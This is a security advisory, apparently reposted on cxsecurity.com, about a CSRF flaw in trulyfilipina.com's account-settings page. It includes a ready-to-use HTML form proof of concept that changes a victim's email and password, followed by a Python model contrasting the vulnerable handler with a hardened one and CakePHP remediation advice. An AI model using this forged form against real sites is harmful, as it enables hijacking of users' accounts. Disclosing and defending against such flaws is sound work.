XSRF Vulnerability in trulyfilipina.com leads to full account takeover

2019.06.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#####################################################################
# Title : XSRF Vulnerability in trulyfilipina.com leads to full account takeover
# Author : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
# Date : 04/06/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
######################################################################
# Happy Eid for everyone :D

## Poc ##

[ + ] Create an account, then log in to the website.
[ + ] Go to https://v1.trulyfilipina.com/settings/manageaccount/ , intercept the account-settings request (e.g. in a proxy) and generate a CSRF PoC from it.
[ + ] Edit the values (new email and password), then deliver the form to the victim. When the logged-in victim opens the page, the browser submits the form with the victim's session cookie, the server accepts the forged request, and the victim's account data is changed without their knowledge.

The form carries no anti-CSRF token and does not ask for the current password, so a single forged submission can reset both the email address and the password. The attacker then logs in with the new credentials: a full account takeover.

----------------------------- Vulnerable Form ------------------------------------------------------
<!-- Csrf Poc -->
<!-- Hidden fields copied from the site's manageaccount form, pre-filled with attacker values;
     no CSRF token and no current-password field are required by the server. -->
<form action="https://v1.trulyfilipina.com/settings/manageaccount/" class="form-horizontal" role="form" id="MemberManageaccountForm" method="post" accept-charset="utf-8">
  <input type="hidden" name="_method" value="POST"/>
  <!-- new email address the attacker controls -->
  <input name="data[Member][email]" value="hackedbybassem@gmail.com" maxlength="255" type="hidden" id="MemberEmail" required="required"/>
  <!-- new password and confirmation (fill both with the same value) -->
  <input name="data[Member][password]" class="form-control" value="" type="hidden" id="MemberPassword"/>
  <input name="data[Member][repassword]" class="form-control" value="" type="hidden" id="MemberRepassword"/>
  <input type="submit"/>
</form>
-------------------------------------------------------------
Sh00tz To my pc :V
--------------------------------------------------------------
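The root cause is that the manageaccount handler honours any POST that arrives with a valid session cookie. The Python model below is added here as an illustration and is not trulyfilipina.com's code: it puts a handler with that behaviour beside a hardened one that checks the Origin/Referer header, requires a per-session synchronizer token, and re-authenticates before changing credentials. The Session and Request types, SITE_ORIGIN, the `_csrf_token` and `data[Member][current_password]` field names, and the sample passwords are assumptions; the email value and the `data[Member][...]` field names come from the PoC form above.

```python
"""Model of the manageaccount handler: the vulnerable behaviour beside a
hardened version. Constructed example, not trulyfilipina.com's code."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "https://v1.trulyfilipina.com"  # origin of the vulnerable form (from the advisory)


def hash_password(pw: str) -> str:
    # Stand-in for a real password hash (use argon2/bcrypt in production).
    return hashlib.sha256(pw.encode()).hexdigest()


@dataclass
class Session:
    """Server-side state that the victim's session cookie resolves to (assumed)."""
    email: str
    password_hash: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal model of an incoming HTTP request (assumed)."""
    method: str
    headers: dict
    form: dict


def manage_account_vulnerable(session: Session, req: Request) -> int:
    """Accepts any POST carrying the session: nothing ties the submission to a
    page the site served, so a cross-site form changes email and password."""
    if req.method != "POST":
        return 405
    session.email = req.form.get("data[Member][email]", session.email)
    pw = req.form.get("data[Member][password]", "")
    if pw and pw == req.form.get("data[Member][repassword]"):
        session.password_hash = hash_password(pw)
    return 200


def same_origin(req: Request) -> bool:
    """Defence in depth: Origin (or, failing that, Referer) must name the site
    itself. A missing header is treated as cross-site; that can reject users
    behind header-stripping proxies, which is why the token check below is
    the primary control."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def manage_account_hardened(session: Session, req: Request) -> int:
    if req.method != "POST":
        return 405
    if not same_origin(req):
        return 403
    # Synchronizer token: the form the site rendered carried session.csrf_token in
    # a hidden field; an attacker's page cannot read it, so it cannot forge it.
    if not hmac.compare_digest(req.form.get("_csrf_token", ""), session.csrf_token):
        return 403
    # Re-authenticate before touching credentials (hypothetical field name).
    current = req.form.get("data[Member][current_password]", "")
    if not hmac.compare_digest(hash_password(current), session.password_hash):
        return 403
    new_email = req.form.get("data[Member][email]")
    if new_email:
        session.email = new_email
    pw = req.form.get("data[Member][password]", "")
    if pw:
        if pw != req.form.get("data[Member][repassword]"):
            return 400
        session.password_hash = hash_password(pw)
    return 200


# Constructed from the PoC form in the advisory; password values are assumed.
FORGED_FORM = {
    "_method": "POST",
    "data[Member][email]": "hackedbybassem@gmail.com",
    "data[Member][password]": "attacker-chosen",
    "data[Member][repassword]": "attacker-chosen",
}


def run_forged(handler):
    """Replay the cross-site form against a handler; returns (status, email after)."""
    victim = Session(email="victim@example.com", password_hash=hash_password("victim-pass"))
    req = Request("POST", {"Origin": "https://attacker.example"}, dict(FORGED_FORM))
    return handler(victim, req), victim.email


def run_legit():
    """A same-origin submission with the session's token and current password."""
    victim = Session(email="victim@example.com", password_hash=hash_password("victim-pass"))
    form = {"_csrf_token": victim.csrf_token,
            "data[Member][current_password]": "victim-pass",
            "data[Member][email]": "new@example.com"}
    req = Request("POST", {"Origin": SITE_ORIGIN}, form)
    return manage_account_hardened(victim, req), victim.email


if __name__ == "__main__":
    print(run_forged(manage_account_vulnerable))  # (200, 'hackedbybassem@gmail.com')
    print(run_forged(manage_account_hardened))    # (403, 'victim@example.com')
    print(run_legit())                            # (200, 'new@example.com')
```

The `data[Member][...]` field naming suggests a CakePHP application; CakePHP ships CSRF protection (SecurityComponent in 2.x, CsrfComponent and later CsrfProtectionMiddleware in 3.x and up), so enabling it on this form and requiring the current password for email and password changes closes the issue without custom code.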


Copyright 2019, cxsecurity.com